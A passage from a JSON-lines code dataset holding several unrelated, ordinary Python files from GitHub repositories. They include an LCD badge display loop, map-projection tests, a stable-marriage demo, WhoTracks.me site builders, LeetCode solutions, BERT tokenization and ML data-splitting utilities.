font=\"10S_DBLCD\", size=0, halign='center', valign='middle', inverted=False, spacing=1, char_width=None, text=track_code)\n room_image = renderer.render_text(width=68, height=16, pad_left=0, pad_top=3, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=ROOM_ABBREVIATIONS.get(event['room'], event['room']))\n title_image = renderer.render_text(width=1000, height=16, pad_left=0, pad_top=0, font=\"10_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=event['title'])\n time_image = renderer.render_text(width=50, height=16, pad_left=0, pad_top=0, font=\"10S_DBLCD\", size=0, halign='right', valign='top', inverted=True, spacing=1, char_width=None, text=time_text)\n \n room_bbox = room_image.getbbox()\n room_image = room_image.crop((0, 0, room_bbox[2], room_bbox[3]))\n title_bbox = title_image.getbbox()\n title_image = title_image.crop((0, 0, title_bbox[2], title_bbox[3]))\n \n display.image(page, 0, y_base, track_image)\n display.image(page, 26, y_base+1, room_image)\n if title_image.size[0] > 140:\n display.scroll_image(i*2+1, page, 96, y_base+3, 140, title_image, extra_whitespace=50)\n else:\n display.image(page, 96, y_base+3, title_image)\n display.image(page, 238, y_base+3, time_image)\n else:\n no_evt_img = renderer.render_text(width=display_width-24, height=48, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='center', valign='middle', inverted=True, spacing=2, char_width=None, text=\"No Events :(\")\n display.image(page, 24, 16, no_evt_img)\n elif mode == \"pride\":\n display.fill_area(page, x=0, y=0, width=24, height=64, state=1)\n flags = [file for file in os.listdir(\"../flags\") if not file.endswith(\"json\")]\n flag = random.choice(flags)\n flag_path = os.path.join(\"../flags\", flag)\n info_path = os.path.join(\"../flags\", os.path.splitext(flag)[0] + 
\".json\")\n print(\"Displaying flag:\", flag)\n sectors = _flag_to_sectors(flag_path)\n with open(info_path, 'r') as f:\n info = json.load(f)\n for i, color in enumerate(sectors):\n gcm.set_sector(i, color)\n name_image = renderer.render_text(width=256, height=24, pad_left=0, pad_top=0, font=\"14S_DBLCD\", size=0, halign='left', valign='middle', inverted=True, spacing=2, char_width=None, text=\"Pride Flags: \" + info['name'])\n display.image(page, 32, 0, name_image)\n #info_image = renderer.render_multiline_text(width=256, height=40, pad_left=0, pad_top=0, font=\"10S_DBLCD\", size=0, halign='left', valign='bottom', inverted=True, h_spacing=1, v_spacing=3, char_width=None, text=info['info'], auto_wrap=True, break_words=False)\n #display.image(page, 32, 24, info_image)\n elif mode == \"images\":\n images = [file for file in os.listdir(\"../images\")]\n image = random.choice(images)\n image_path = os.path.join(\"../images\", image)\n print(\"Displaying image:\", image)\n display.image(page, 24, 0, image_path)\n \n \n # Process any messages from the display and check for errors\n while True:\n response = display.send_tx_request()\n if response[0] == 0x15:\n break\n display.check_error(response)\n \n display.set_page(page)\n time.sleep(0.4) # LCD update delay\n gcm.update()\n if not hackertours_boarding:\n # HT boarding stays until the flag is reset, so prevent mode switching\n mode_index += 1\n if mode_index >= len(DISPLAY_MODES):\n mode_index = 0\n mode = DISPLAY_MODES[mode_index]\n last_page_update = time.time()\n except KeyboardInterrupt:\n raise\n except:\n try:\n display.port.close()\n except:\n pass\n try:\n gcm.port.close()\n except:\n pass\n raise\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n main()\n except KeyboardInterrupt:\n break\n except:\n traceback.print_exc()\n print(\"Restarting in 10 seconds\")\n time.sleep(10)\n","repo_name":"Mezgrman/CCCamp23-RGB-LCD","sub_path":"python/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":17557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32756211395","text":"import unittest\n\nfrom svgis import projection\nfrom svgis.errors import SvgisError\nfrom svgis.utils import DEFAULT_GEOID\n\nSHP = 'tests/fixtures/cb_2014_us_nation_20m.json'\n\n\nclass ProjectionTestCase(unittest.TestCase):\n def testUtm(self):\n assert projection.utm_proj4(-21, 42) == '+proj=utm +zone=27 +north +datum=WGS84 +units=m +no_defs'\n\n assert projection.utm_proj4(-21, -42) == '+proj=utm +zone=27 +south +datum=WGS84 +units=m +no_defs'\n\n with self.assertRaises(SvgisError):\n projection.utm_proj4(-200, 100)\n\n def testLocalTm(self):\n fixture = (\n '+proj=lcc +lon_0=0 +lat_1=0 +lat_2=0 +lat_0=0 '\n '+x_0=0 +y_0=0 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs'\n )\n self.assertEqual(projection.tm_proj4(0, 0, 0), fixture)\n\n def testGenerateCRS(self):\n bounds = -82.2, 40.1, -78.9, 45.8\n a = projection.generateproj4('utm', bounds=bounds, file_crs=DEFAULT_GEOID)\n self.assertEqual(a, '+proj=utm +zone=17 +north +datum=WGS84 +units=m +no_defs')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fitnr/svgis","sub_path":"tests/test_projection.py","file_name":"test_projection.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"32"} +{"seq_id":"265587166","text":"# Author : James Hope \n# Date : 13 April 2018 \n \nimport sys\nimport numpy as np\n\ndebug = False\n\n# Pool Class :: 
holds engagements\nclass Pool:\n def __init__(self, acceptors):\n \"\"\"\n Construct an array which will hold the engagements. Instatiate each maximum preference number that \n \"\"\"\n self.engagements = np.empty(shape=len(acceptors))\n self.engagements.fill(np.nan) \n\n def new_engagement(self,acceptor,proposer):\n \"\"\"\n Update (replace) the engagement in the pool \n \"\"\"\n if proposer in self.engagements:\n print(proposer, \"in position\", self.engagements.tolist().index(proposer)+1, \"set to NaN\")\n self.engagements[self.engagements.tolist().index(proposer)] = np.nan\n\n self.engagements[acceptor-1] = proposer\n \n def is_complete(self):\n \"\"\"\n Return True if complete\n \"\"\"\n if (np.isnan(self.engagements).any()):\n return False\n else:\n return True\n\n def get_current_engagement(self,acceptor): \n \"\"\"\n Return the current engagement for a acceptor\n \"\"\"\n return self.engagements[acceptor-1]\n\n def get_all_engagements(self):\n \"\"\"\n Return all the current engagements\n \"\"\" \n return self.engagements\n\n# Acceptor Class :: holds the acceptor preferences\nclass Acceptor:\n def __init__(self,values):\n \"\"\"\n Construct the acceptor preferences\n \"\"\"\n self.values = values\n\n def get_preference_number(self,acceptor,proposer):\n \"\"\"\n Return the preference of the acceptor for the proposer passed\n \"\"\"\n #print(self.values[acceptor-1])\n if proposer in self.values[acceptor-1]:\n return self.values[acceptor-1].index(proposer)+1\n else: \n return 0\n\n def is_proposal_accepted(self,acceptor,proposer):\n \"\"\"\n If proposer is in accepter preferences return true else return false\n \"\"\"\n if debug: (print(\"acceptor preference of proposal\", self.get_preference_number(acceptor,proposer)))\n if debug: (print(\"acceptor currently engaged to\", pool_object.get_current_engagement(acceptor)))\n if debug: (print(\"acceptor preference of current engagement\", self.get_preference_number(acceptor,pool_object.get_current_engagement(acceptor))))\n\n if (np.isnan(pool_object.get_current_engagement(acceptor)) and (self.get_preference_number(acceptor,proposer)!=0)):\n return True\n \n if (self.get_preference_number(acceptor,proposer) < self.get_preference_number(acceptor,pool_object.get_current_engagement(acceptor))): \n return True \n else:\n return False\n\n# Proposer Class :: holds the proposer preferences\nclass Proposer:\n def __init__(self, values):\n \"\"\"\n Construct the proposer preferences\n \"\"\"\n self.values = values\n\n def get_proposal(self,proposer,iteration):\n \"\"\"\n Return the acceptor value (proposal to try) for the proposer and iteration passed\n \"\"\"\n #return self.values.iloc[proposer,iteration]\n return self.values[proposer][iteration]\n\n# Create dummy data\nacceptors_table = [[1,2,3,4],[3,4,1,2],[4,2,3,1],[3,2,1,4]]\nproposers_table = [[2,1,3,4],[4,1,2,3],[1,3,2,4],[2,3,1,4]]\n\n# Instantiate the Acceptor and Proposer class\naccepter_object = Acceptor(acceptors_table)\nproposer_object = Proposer(proposers_table)\n\nprint(\"Acceptors Table:\", accepter_object.values)\nprint(\"Proposers Table:\", proposer_object.values)\n\n# Instantiate the pool class\npool_object = Pool(np.unique(acceptors_table))\nif debug: print(\"Pool Object:\", pool_object.get_all_engagements())\n\ndef stable_marriage():\n for iteration in range(len(proposers_table)):\n print(\"\\n Round:\", iteration+1)\n for proposer in range(len(proposers_table[iteration])):\n print(\"PROPOSAL:\", proposer+1, \"---->\", proposers_table[proposer][iteration]) \n \n if 
accepter_object.is_proposal_accepted(proposer_object.get_proposal(proposer,iteration),proposer+1): #if proposal is accepter\n if debug: print(\"PROPOSAL ACCEPTED\")\n pool_object.new_engagement(proposer_object.get_proposal(proposer,iteration),proposer+1)\n else:\n if debug: print(\"PROPOSAL FAILED\")\n print(\"ENGAGEMENTS:\", pool_object.get_all_engagements())\n\n if pool_object.is_complete():\n return pool_object.get_all_engagements()\n\nprint(\"\\n FINAL ENGAGEMENTS:\", stable_marriage())\n\n","repo_name":"jamesdhope/teaching-lecturing-resources","sub_path":"stableGroups.py","file_name":"stableGroups.py","file_ext":"py","file_size_in_byte":4616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7840877248","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom collections import Counter, defaultdict\nfrom datetime import datetime\nfrom statistics import mean\n\nfrom jinja2 import Markup\n\nfrom whotracksme.website.utils import print_progress\nfrom whotracksme.website.templates import (\n get_template,\n render_template,\n)\nfrom whotracksme.website.plotting.utils import arrow_style\nfrom whotracksme.website.plotting.colors import SiteCategoryColors\nfrom whotracksme.website.plotting.trackers import ts_trend\n\n\ndef prevalence(app):\n pages_change = abs(round((app['history'][-2]['reach'] - app['history'][-1]['reach'] ) * 100, 1)) if len (app['history']) > 1 else 0.\n pages_change_background_color, pages_change_color, pages_change_class = arrow_style(pages_change)\n\n domains_change = abs(round((app['history'][-2]['site_reach'] - app['history'][-1]['site_reach'] ) * 100, 1)) if len (app['history']) > 1 else 0.\n domains_change_background_color, domains_change_color, domains_change_class = arrow_style(domains_change)\n\n return {\n \"pages\": round(app['history'][-1]['reach'] * 100, 1),\n \"pages_change\": {\n \"value\": pages_change,\n \"background_color\": pages_change_background_color,\n \"color\": pages_change_color,\n \"class\": pages_change_class,\n },\n \"domains\": round(app['history'][-1]['site_reach'] * 100, 1),\n \"domains_change\": {\n \"value\": domains_change,\n \"background_color\": domains_change_background_color,\n \"color\": domains_change_color,\n \"class\": domains_change_class\n }\n }\n\n\ndef timeseries(app):\n ts = []\n page_reach = []\n site_reach = []\n for t in app[\"history\"]:\n page_reach.append(t.get(\"reach\"))\n ts.append(t.get(\"ts\"))\n site_reach.append(t.get(\"site_reach\"))\n\n # Make dates valid\n ts = [datetime.strptime(t, \"%Y-%m\") for t in ts]\n return ts, page_reach, site_reach\n\n\ndef tracking_methods(app):\n # Reducing values to booleans\n methods = {\n \"cookies\": False,\n \"fingerprinting\": False\n }\n if app.get(\"overview\", {}).get(\"cookies\") > 0.2:\n methods[\"cookies\"] = True\n if app.get(\"overview\", {}).get(\"bad_qs\") > 0.1:\n methods[\"fingerprinting\"] = True\n return methods\n\n\ndef presence_by_site_type(app, sites):\n categories = Counter(\n filter(lambda c: len(c) > 0,\n [sites.get(s['site'], {}).get('category', '') for s in app.get(\"sites\")]))\n if categories.items():\n normalized_categories = []\n total = sum(categories.values())\n for (k, v) in categories.items():\n if not k == '':\n normalized_categories.append((k, round(100 * (v / float(total)))))\n\n return sorted(normalized_categories, key=lambda x: x[1], reverse=True)\n return []\n\n\ndef similar_trackers(app, apps, n=4):\n sorted_trackers = sorted(apps.values(), key=lambda a: 
a['overview']['reach'], reverse=True)\n\n top_n = []\n for t in sorted_trackers:\n if len(top_n) > n:\n break\n t_subset = {}\n\n if t.get('cat') == app.get('cat') and t.get('overview', {}).get('id') != app.get('id'):\n t_subset['id'] = t['overview']['id']\n\n if 'company_id' in t:\n t_subset['company_id'] = t['company_id']\n top_n.append(t_subset)\n\n return top_n\n\n\ndef tag_cloud_data(aid, app, data):\n def get_site_frequency(site):\n site = data.sites.get(site, None)\n if site is None:\n return 0.\n for site_app in site['apps']:\n if site_app['app'] == aid:\n return site_app['frequency']\n\n sites_table = [{\n 'site': s['site'],\n 'frequency': s['frequency'],\n 'url': data.url_for('site', s['site'], path_to_root='..') if data.get_site_name(s['site']) is not None else None,\n 'site_freq': get_site_frequency(s['site']),\n 'site_cat': SiteCategoryColors.get(data.sites.get(s['site'], {}).get('category', '').strip(), '#000'),\n 'category': data.sites.get(s['site'], {}).get('category', '').strip()\n } for s in app.get('sites')]\n\n n_unlinked = len(list(filter(lambda s: s['url'] is None, sites_table)))\n # decide whether non-topsite sites should be included\n if len(sites_table) - n_unlinked > 30:\n sites_table = list(filter(lambda s: s['url'] is not None, sites_table))\n\n return sites_table\n\n\ndef sites_per_app_by_category(sites_table):\n sites_by_cat = defaultdict(list)\n for s in sites_table:\n sites_by_cat[s[\"category\"].strip()].append(s)\n return sites_by_cat\n\n\ndef tracker_header_stats(apps):\n cookies = []\n fingerpriting = []\n data = []\n for apid, app in apps.items():\n cookies.append(True if app.get(\"overview\", {}).get(\"cookies\") > 0.2 else False)\n fingerpriting.append(True if app.get(\"overview\", {}).get(\"bad_qs\") > 0.1 else False)\n data.append(app.get(\"overview\", {}).get(\"content_length\", 0))\n\n return {\n \"by_cookies\": sum(cookies)/len(cookies),\n \"by_fingerprinting\": sum(fingerpriting)/len(fingerpriting),\n \"data\": mean(data)\n }\n\ndef build_trackers_list(data):\n apps = data.apps\n\n sorted_trackers = sorted(apps.values(), key=lambda a: a['overview']['reach'], reverse=True)\n sorted_trackers_cat = sorted(\n apps.values(),\n key=lambda a: data.get_app_name(\n a['overview']['id']) if (\n 'company_id' not in a or\n a['company_id'] in [None, \"None\"])\n else a['company_id']\n )\n\n for tracker in sorted_trackers:\n if 'name' not in tracker:\n tracker['name'] = tracker['overview']['id']\n\n with open('_site/trackers.html', 'w') as output:\n output.write(render_template(\n template=get_template(data, name=\"trackers.html\"),\n tracker_list=sorted_trackers,\n trackers_list_cat=sorted_trackers_cat,\n header_stats=tracker_header_stats(data.apps)\n ))\n\n print_progress(text=\"Generate tracker list\")\n\n\ndef tracker_page(template, aid, app, data):\n if 'name' not in app:\n app['name'] = aid\n\n # Tracker Reach ts\n ts, page_reach, site_reach = timeseries(app)\n\n # page_reach trend line\n page_trend = Markup(ts_trend(ts=page_reach, t=ts))\n\n # domain_reach trend line\n site_trend = Markup(ts_trend(ts=site_reach, t=ts))\n\n methods = tracking_methods(app)\n\n # tag cloud data\n sites_table = tag_cloud_data(aid, app, data)\n sites_by_cat = sites_per_app_by_category(sites_table)\n\n # for horizontal bar chart in profile\n website_types = presence_by_site_type(app, data.sites)\n\n # similar trackers\n similar_tracker_list = similar_trackers(app, data.apps, n=4)\n\n # write to file\n with open('_site/{}'.format(data.url_for('app', aid)), 'w') as output:\n 
output.write(render_template(\n path_to_root='..',\n template=template,\n app=app,\n profile=app, # profile-card hack\n prevalence=prevalence(app),\n tracking_methods=methods,\n website_list=sites_table,\n sites_by_cat=sites_by_cat,\n website_types=website_types[:5], # top 3\n similar_trackers=similar_tracker_list,\n trends={\"page\": page_trend, \"site\": site_trend}\n ))\n\n\ndef build_tracker_pages(data):\n apps = data.apps\n template = get_template(data, name='tracker-page.html', path_to_root='..')\n\n for (aid, app) in apps.items():\n tracker_page(template, aid, app, data)\n\n print_progress(text=\"Generate tracker pages\")\n","repo_name":"valerymamontov/whotracks.me","sub_path":"whotracksme/website/build/trackers.py","file_name":"trackers.py","file_ext":"py","file_size_in_byte":7652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"3594093549","text":"import string\nimport random\nimport csv\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ['DVPD-'+''.join(random.choice(chars) for _ in range(size))]\n\ncsvfile=open('voucher.csv','w', newline='')\nobj=csv.writer(csvfile)\nfor x in range (0,99):\n obj.writerow(id_generator(12))\ncsvfile.close()","repo_name":"Maxwell39/dvoc_api","sub_path":"mockapi/core/voucher.py","file_name":"voucher.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42715040617","text":"import logging\nfrom os import environ\n\nlogger = logging.getLogger(\"AniList\")\nlogger.setLevel(logging.DEBUG if environ.get(\"DEV\") == \"true\" else logging.INFO)\n\nhandler = logging.StreamHandler()\nhandler.setFormatter(\n logging.Formatter(\n fmt=\"%(asctime)s [%(levelname)s] - %(name)s: %(message)s\", datefmt=\"%x %X\"\n )\n)\n\nlogger.addHandler(handler)\n","repo_name":"pxseu/anilist-readme","sub_path":"anilist_readme/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"33972995136","text":"import urllib.request, json\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"saveloc\", help=\"The location to save images to (eg. 'C:/users/images')\")\r\nparser.add_argument(\"--mkt\", help=\"The market the images are meant for (eg. 
en-CA)\")\r\nargs = parser.parse_args()\r\n\r\n#Change the market to get these images from if it was specified\r\nif args.mkt:\r\n    url_str = \"\"\"https://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt={}\"\"\".format(args.mkt)\r\nelse:\r\n    url_str = \"https://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1&mkt=en-CA\"\r\n\r\n\r\n#Download the images\r\nwith urllib.request.urlopen(url_str) as url:\r\n    data = json.loads(url.read().decode())\r\n    picture_url = data['images'][0]['url'];\r\n\r\n    #The picture url looks like '/az/hprichbg/rb/Mellieha_EN-CA9931288836_1920x1080.jpg'\r\n    #This line gets the part between ...rb/ and _EN-CA...\r\n    picture_name = picture_url.split(\"/\")[4].split(\"_\")[0]\r\n\r\n    #Download and save the image\r\n    urllib.request.urlretrieve('https://www.bing.com' + picture_url,\r\n                               \"{}/{}.jpg\".format(args.saveloc, picture_name))\r\n","repo_name":"ConMur/PythonScripts","sub_path":"IOTD.py","file_name":"IOTD.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25543651484","text":"\"\"\" This class is only imported if windows OS is detected\r\n\"\"\"\r\n\r\nfrom gooey import Gooey, GooeyParser\r\n\r\n\r\n@Gooey()\r\ndef get_args_gooey():\r\n    parser = GooeyParser(description='crc32 tool')\r\n    parser.add_argument(\"path\", help=\"path to crc; or json file to read\", widget='FileChooser')\r\n    parser.add_argument(\"-o\", \"--output\", default=None, help=\"save output json\")\r\n    parser.add_argument(\"-r\", \"--read\", action=\"store_true\", default=False, help=\"reads a crc json file\")\r\n    parser.add_argument(\"-R\", \"--recursive\", action=\"store_true\", default=False, help=\"recursively scan folders\")\r\n    parser.add_argument(\"-p\", \"--pretty-output\", action=\"store_true\", default=False)\r\n    return parser.parse_args()\r\n","repo_name":"Eggertron/crcsum","sub_path":"windows_gui.py","file_name":"windows_gui.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3391146498","text":"from typing import List\nimport collections\n\n\nclass Solution: #376 ms\n    \n    def minStickers(self, stickers: List[str], target: str) -> int:\n\n        t_count = collections.Counter(target)        \n        A = [collections.Counter(sticker) & t_count for sticker in stickers]\n        for i in range(len(A) - 1, -1, -1):\n            if any(A[i] == A[i] & A[j] for j in range(len(A)) if i != j):\n                A.pop(i) # goes from back to front so it's ok\n\n        self.best=len(target)\n        self.n=len(A)\n        for c in target:\n            found=False\n            for s in stickers:\n                if c in s:\n                    found=True\n                    break\n            if not found:\n                return -1\n        \n        \n        def solve(used:int,i:int) -> int:\n            # print(i)\n            if i==self.n:\n                if all(t_count[x]<=0 for x in t_count):\n                    self.best=min(self.best,used)\n                return\n            # print(stickers[i]+\" \"+str(used))\n            if used >=self.best:\n                return #early pruning\n            sticker=A[i] # a counter\n            x=max(t_count[letter] // sticker[letter]\n                       for letter in sticker)\n            x=max(x,0)\n            \n            for c in sticker:\n                t_count[c]-=x*sticker[c]\n                # print(c,sticker[c])\n            solve(used+x,i+1)\n            for j in range(x-1,-1,-1):\n                for letter in sticker:\n                    t_count[letter]+=sticker[letter]\n                solve(used+j,i+1)\n            \n        solve(0,0)\n        return self.best\n\nclass Solution: # very slow, but used DFS\n    \n    def minStickers(self, stickers: List[str], target: str) -> int:\n        def get_frq(target:str) -> List[int]:\n            res=[0]*26\n            for c in target:\n                res[ord(c)-ord('a')]+=1\n            return res\n        self.frq=get_frq(target)\n        # print(self.frq)\n        self.best=len(target)\n        
self.n=len(stickers)\n        for c in target:\n            found=False\n            for s in stickers:\n                if c in s:\n                    found=True\n                    break\n            if not found:\n                return -1\n        \n        \n        def solve(used:int,i:int) -> int:\n            \n            if i==self.n:\n                if sum(self.frq)==0:\n                    print(\"END \"+str(used))\n                    self.best=min(self.best,used)\n                return\n            # print(stickers[i]+\" \"+str(used))\n            if used >=self.best:\n                return #early pruning\n            sfrq=get_frq(stickers[i])\n            \n            x=0\n            for j in range(26):\n                if sfrq[j]==0:\n                    continue\n                x=max(x,self.frq[j]//sfrq[j])\n            \n            for j in range(x,-1,-1):\n                temp=self.frq.copy()\n                for k in range(26): # apply this sticker j times\n                    self.frq[k]=max(0,self.frq[k]-j*sfrq[k])\n                # print(\"applied \"+stickers[i]+\" \"+str(j)+\" times\")\n                solve(used+j,i+1)\n                self.frq=temp.copy()\n            \n        solve(0,0)\n        return self.best\n\nclass Solution: #25% for python time, dp based on chars left\n    def minStickers(self, stickers: List[str], target: str) -> int:\n        self.dp={}\n        self.frq=[0]*26\n        n,best=len(target),len(target)\n        for c in target:\n            found=False\n            for s in stickers:\n                if c in s:\n                    found=True\n                    break\n            if not found:\n                return -1\n            self.frq[ord(c)-ord('a')]+=1\n        self.dp[\"\"]=0\n        def get_id() -> str:\n            res=\"\"\n            for i in range(26):\n                if self.frq[i]==0:\n                    continue\n                res+= chr(i+ord('a'))+ str(self.frq[i])\n            return res\n        \n        def solve() -> int:\n            di=get_id()\n            # print(di)\n            if di in self.dp:\n                return self.dp[di]\n            res=15\n            for s in stickers:\n                temp=self.frq.copy()\n                found=False\n                for c in s:\n                    if self.frq[ord(c)-ord('a')]>0:\n                        self.frq[ord(c)-ord('a')]-=1\n                        found=True\n                if not found:\n                    continue\n                res=min(res,solve()+1)\n                self.frq=temp.copy()\n            self.dp[di]=res\n            return res\n        return solve()\n","repo_name":"apluscs/Leetcode","sub_path":"0691. Stickers to Spell Word.py","file_name":"0691. Stickers to Spell Word.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38303365302","text":"import torch\nfrom transformers import BertTokenizer\n\n\ndef get_tokens_from_sentences(sentences, tokenizer=None):\n    if tokenizer is None:\n        tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n    # Tokenize all of the sentences and map the tokens to their word IDs.\n    input_ids = []\n    attention_masks = []\n\n    for sentence in sentences:\n        encoded_dict = tokenizer.encode_plus(\n            sentence,  # Sentence to encode.\n            add_special_tokens=True,  # Add '[CLS]' and '[SEP]'\n            truncation=True,\n            max_length=128,  # Pad & truncate all sentences.\n            padding='max_length',\n            return_attention_mask=True,  # Construct attn. 
masks.\n            return_tensors='pt',  # Return pytorch tensors.\n        )\n\n        input_ids.append(encoded_dict['input_ids'])\n        attention_masks.append(encoded_dict['attention_mask'])\n\n    # Convert the lists into tensors.\n    input_ids = torch.cat(input_ids, dim=0)\n    attention_masks = torch.cat(attention_masks, dim=0)\n    return input_ids, attention_masks, tokenizer\n","repo_name":"crisz/Thesis_explaining_bias","sub_path":"src/utils/huggingface.py","file_name":"huggingface.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32594144178","text":"import numpy as np\n\n\n\ndef shuffle_data(X, y, seed=None):\n    \"\"\"Random shuffle of the samples in X and y\"\"\"\n    if seed:\n        np.random.seed(seed)\n    idx = np.arange(X.shape[0])\n    np.random.shuffle(idx)\n    return X[idx], y[idx]\n\n\ndef batch_iterator(X, y=None, batch_size=64):\n    \"\"\"Simple batch generator\"\"\"\n    n_samples = X.shape[0]\n    for i in np.arange(0, n_samples, batch_size):\n        begin, end = i, min(i + batch_size, n_samples)\n        if y is not None:\n            yield X[begin:end], y[begin:end]\n        else:\n            yield X[begin:end]\n\n\ndef split_data_by_feature(dataset, feature_index, threshold):\n    \"\"\"Divide dataset based on whether the sample value at the feature index is larger than\n    the given threshold\n\n    Binarisation (partition logic) can be modified\n    \"\"\"\n    split_func = None\n    if isinstance(threshold, int) or isinstance(threshold, float):\n        # print(\"split\", \"isinstance\")\n        split_func = lambda sample: sample[feature_index] >= threshold\n    else:\n        # print(\"split\", \"is not instance\")\n        split_func = lambda sample: sample[feature_index] == threshold\n\n    dataset_left = np.array([sample for sample in dataset if split_func(sample)])\n    dataset_right = np.array([sample for sample in dataset if not split_func(sample)])\n\n    return np.array([dataset_left, dataset_right])\n\n\ndef bootstrap_samples(X, y):\n    \"\"\"Return random subsets with replacement of the data\"\"\"\n    n_samples = X.shape[0]\n    random_indexes = np.random.choice(n_samples, n_samples, replace=True)\n    return X[random_indexes], y[random_indexes]\n\n\ndef train_test_split(X, y, test_size=0.5, shuffle=True, seed=None):\n    \"\"\"Split the data into train and test sets\"\"\"\n    if shuffle:\n        X, y = shuffle_data(X, y, seed)\n    # Split the training data from test data in the ratio specified in\n    # test_size\n    split_i = len(y) - int(len(y) // (1 / test_size))\n    X_train, X_test = X[:split_i], X[split_i:]\n    y_train, y_test = y[:split_i], y[split_i:]\n\n    return X_train, X_test, y_train, y_test\n\n\ndef k_fold_cross_validation_sets(X, y, k, shuffle=True):\n    \"\"\"Split the data into k sets of training / test data\"\"\"\n    if shuffle:\n        X, y = shuffle_data(X, y)\n\n    n_samples = len(y)\n    left_overs = {}\n    n_left_overs = n_samples % k\n    if n_left_overs != 0:\n        left_overs[\"X\"] = X[-n_left_overs:]\n        left_overs[\"y\"] = y[-n_left_overs:]\n        X = X[:-n_left_overs]\n        y = y[:-n_left_overs]\n\n    X_split = np.split(X, k)\n    y_split = np.split(y, k)\n    sets = []\n    for i in range(k):\n        X_test, y_test = X_split[i], y_split[i]\n        X_train = np.concatenate(X_split[:i] + X_split[i + 1 :], axis=0)\n        y_train = np.concatenate(y_split[:i] + y_split[i + 1 :], axis=0)\n        sets.append([X_train, X_test, y_train, y_test])\n\n    # Add left over samples to last set as training samples\n    # (np.append returns a new array, so the result must be reassigned)\n    if n_left_overs != 0:\n        sets[-1][0] = np.append(sets[-1][0], left_overs[\"X\"], axis=0)\n        sets[-1][2] = np.append(sets[-1][2], left_overs[\"y\"], axis=0)\n\n    return 
np.array(sets)\n","repo_name":"Glebmaksimov/scratch_implemented","sub_path":"utils/data_manipulation.py","file_name":"data_manipulation.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71739163930","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\n\nJoiner instances helps to insert in Hierarchized databases, get the corresponding\nRetrieveIndexesLists if it was already inserted, and then insert locally\ndepending if it is a new row compared to all HierarchizedRetrieveIndexesListsList\n\n\"\"\"\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Standards.Modelers.Joiner\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\"\nSYS.setSubModule(globals())\n#\n\n#\nimport collections\nimport tables\n\nfrom ShareYourSystem.Functers import Imitater,Switcher\nfrom ShareYourSystem.Standards.Objects import Noder\n#\n\n#\n@DecorationClass()\nclass HierarchizerClass(BaseClass):\n\t\n\t#Definition\n\tRepresentingKeyStrsList=[\n\t\t\t\t\t\t\t\t\t'HierarchizingNodeStr',\n\t\t\t\t\t\t\t\t\t'HierarchizingDatabaseNodeStr',\n\t\t\t\t\t\t\t\t\t'HierarchizingDatabaseKeyStr',\n\t\t\t\t\t\t\t\t\t'HierarchizedNodeVariablesList',\n\t\t\t\t\t\t\t\t\t'HierarchizedDeriveDatabasersList',\n\t\t\t\t\t\t\t\t\t'HierarchizedKeyStrsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListColumnStrsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedRetrieveIndexesListGetStrsList',\n\t\t\t\t\t\t\t\t\t'HierarchizedInsertIndexIntsList'\n\t\t\t\t\t\t\t\t]\n\n\t#@Hooker.HookerClass(**{'HookingAfterVariablesList':[{'CallingVariable':BaseClass.__init__}]})\n\tdef 